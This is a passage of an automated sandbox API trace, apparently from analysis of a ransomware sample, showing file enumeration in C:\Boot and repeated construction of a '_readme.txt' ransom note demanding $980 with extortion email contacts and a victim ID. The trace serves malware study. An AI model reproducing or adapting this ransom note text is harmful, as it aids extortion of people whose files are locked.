ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.404] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.404] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.404] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.405] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.415] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0180.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.416] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.416] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.416] PathFindFileNameW (pszPath="") returned="" [0180.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.416] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.416] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.416] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.417] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.417] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0180.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.417] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0180.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.418] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.418] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.418] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.420] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*" (normalized: "c:\\boot\\ru-ru\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.421] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.421] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.421] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.421] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.422] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 